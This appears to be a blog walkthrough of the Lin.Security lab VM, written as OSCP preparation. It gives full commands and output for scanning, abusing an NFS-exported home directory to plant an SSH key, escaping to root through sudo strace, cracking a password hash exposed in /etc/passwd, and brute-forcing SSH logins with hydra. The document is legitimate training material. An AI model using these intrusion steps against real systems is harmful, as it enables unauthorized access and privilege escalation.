Lin.Security.1 Walkthrough (OSCP Prep)
Host Discovery
First things first, let’s find the target on our network.
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ sudo arp-scan -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:4c:9e:c7, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1 00:50:56:c0:00:08 VMware, Inc.
10.0.10.2 00:50:56:f3:16:00 VMware, Inc.
10.0.10.103 00:0c:29:ed:97:a9 VMware, Inc.
10.0.10.199 00:50:56:fa:ab:65 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 4 responded
We find the target machine at 10.0.10.103
. We can update /etc/hosts
to make things easier:
10.0.10.103 linsecurity
Scanning
Now let’s see what this host has open to us.
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ rustscan -a linsecurity -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.๐ข
[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.103:22
Open 10.0.10.103:111
Open 10.0.10.103:2049
Open 10.0.10.103:34199
Open 10.0.10.103:45371
Open 10.0.10.103:47855
Open 10.0.10.103:60961
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.103
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-10 19:27 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:27
Scanning 10.0.10.103 [2 ports]
Completed Ping Scan at 19:27, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:27
Scanning linsecurity (10.0.10.103) [7 ports]
Discovered open port 111/tcp on 10.0.10.103
Discovered open port 22/tcp on 10.0.10.103
Discovered open port 45371/tcp on 10.0.10.103
Discovered open port 2049/tcp on 10.0.10.103
Discovered open port 60961/tcp on 10.0.10.103
Discovered open port 47855/tcp on 10.0.10.103
Discovered open port 34199/tcp on 10.0.10.103
Completed Connect Scan at 19:27, 0.00s elapsed (7 total ports)
Initiating Service scan at 19:27
Scanning 7 services on linsecurity (10.0.10.103)
Completed Service scan at 19:27, 6.01s elapsed (7 services on 1 host)
NSE: Script scanning 10.0.10.103.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.02s elapsed
Nmap scan report for linsecurity (10.0.10.103)
Host is up, received conn-refused (0.00025s latency).
Scanned at 2021-11-10 19:27:53 CST for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
34199/tcp open mountd syn-ack 1-3 (RPC #100005)
45371/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
47855/tcp open mountd syn-ack 1-3 (RPC #100005)
60961/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds
We see rpcbind
running and a number of ports running mountd
. The first thing we should do is enumerate any available network shares:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ showmount -e linsecurity
Export list for linsecurity:
/home/peter *
We find what appears to be a user’s home directory shared across the network. If we can write to the directory, it should be fairly easy to get access to the machine.
Exploiting a Shared Home Directory
Let’s create a local directory and mount the network share:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ mkdir peter
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ sudo mount -t nfs linsecurity:/home/peter ./peter -o nolock
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ cd peter
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ ls -la
drwx------@ - cvechecker inetsim 10 Jul 2018 ๏ .cache
drwx------@ - cvechecker inetsim 10 Jul 2018 ๏ .gnupg
drwxrwxr-x@ - cvechecker inetsim 10 Jul 2018 ๏ .local
.rw-r--r--@ 220 cvechecker inetsim 9 Jul 2018 ๏
.bash_logout
.rw-r--r--@ 3.8k cvechecker inetsim 9 Jul 2018 ๏ .bashrc
.rw-rw-r--@ 0 cvechecker inetsim 10 Jul 2018 ๏
.cloud-locale-test.skip
.rw-r--r--@ 807 cvechecker inetsim 9 Jul 2018 ๏
.profile
There is nothing immediately interesting here, but do we have write access?
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ mkdir .ssh
mkdir: cannot create directory โ.sshโ: Permission denied
So we don’t have write access, but this is easy to get around. We need to log in (locally) as a user with the same user ID as the owner of this directory. The Uid is 1001 (if you don’t see this, you can verify with the stat
utility). On my machine, you can see there is already a user cvechecker
with this ID. If there is no such user on your machine, you can create one with useradd
command with the -u
option.
Now we should be able to start a shell with the correct user ID and write to the mounted directory:
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ sudo -u cvechecker bash
[cvechecker@apophis peter]$ mkdir .ssh
Now we can add our SSH public key to the .ssh/authorized_keys
file and try to SSH in:
(ori0n@apophis) --> [ ~/linsecurity/peter ]
==> $ ssh -l peter linsecurity
Enter passphrase for key '/home/ori0n/.ssh/id_rsa':
โโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโ โโโโโโโโโโ โโโโโโโโโโโโโโโ โโโ
โโโ โโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโ
โโโ โโโโโโโโโ โโโ โโโโโโโโโโโโโโ โโโ โโโ โโโโโโโโโโโโโโ โโโ โโโโโโโ
โโโ โโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโ โโโ โโโโโโโโโโโโโโ โโโ โโโโโ
โโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโ โโโ
โโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโ โโโ โโโ
Welcome to lin.security | https://in.security | version 1.0
And we’re in!
There are a number of different routes to root
on this box. I’ll cover three here.
Privilege Escalation – First Method
Having obtained access as user peter
, let’s see if he has any sudo
privileges on the machine:
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
So he can run strace
with superuser privileges. A quick check of GTFOBins shows this may be used to spawn a root shell. Let’s try it:
peter@linsecurity:~$ sudo strace -o /dev/null sh
# id
uid=0(root) gid=0(root) groups=0(root)
Well, that was easy!
Privilege Escalation – Second Method
That was too easy! Let’s see if we can find another way in. What other users are on the system?
peter@linsecurity:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bob:x:1000:1004:bob:/home/bob:/bin/bash
statd:x:111:65534::/var/lib/nfs:/usr/sbin/nologin
peter:x:1001:1005:,,,:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
susan:x:1002:1006:,,,:/home/susan:/bin/rbash
One thing that sticks out is the insecurity
user. Beyond the username itself, there are two things of note:
- The user’s UID:GID is
0:0
(root
!) - The user’s password hash is clearly visible
So if we can crack this hash, we should be able to log in with root privileges! Since I’m running on a VM, I’ll use john
to attempt to crack this hash:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ echo AzER3pBZh6WZE > hash
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed. CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message. If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd (?)
1g 0:00:00:00 DONE (2021-11-10 20:36) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..bibiana
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we have the password: P@ssw0rd
.
Does it work?
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ ssh -l insecurity linsecurity
insecurity@linsecurity's password:
โโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโ โโโโโโโโโโ โโโโโโโโโโโโโโโ โโโ
โโโ โโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโ
โโโ โโโโโโโโโ โโโ โโโโโโโโโโโโโโ โโโ โโโ โโโโโโโโโโโโโโ โโโ โโโโโโโ
โโโ โโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโ โโโ โโโโโโโโโโโโโโ โโโ โโโโโ
โโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโ โโโ
โโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโ โโโ โโโ
Welcome to lin.security | https://in.security | version 1.0
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
# id
uid=0(root) gid=0(root) groups=0(root)
Bingo!
Privilege Escalation – Third Method
Finally, let’s use the usernames we enumerated from /etc/passwd
and see if we can crack any particularly bad passwords. Create a file (users.txt
) with a list of the usernames we found:
bob
susan
I’ll ignore the peter
and insecurity
users because we already have access to them. Now, use hydra
to try to brute-force a password. Since brute-forcing SSH is very slow, we will use a small wordlist:
(ori0n@apophis) --> [ ~/linsecurity ]
==> $ hydra -L users.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt linsecurity ssh -t 4
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 20:42:54
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:2/p:500), ~250 tries per task
[DATA] attacking ssh://linsecurity:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 956 to do in 00:22h, 4 active
[22][ssh] host: linsecurity login: bob password: secret
After a few minutes, we have creds: bob:secret
. SSH in and see what Bob can do:
bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
/usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
/usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
One has to wonder why not to just allow full sudo
access if you’re going to allow all of these programs. GTFOBins will find ways to a root shell for many (if not all) of these programs, but we have shells available, so I’ll take the simplest route:
bob@linsecurity:~$ sudo sh
# id
uid=0(root) gid=0(root) groups=0(root)
And there you have it.
Leave a Reply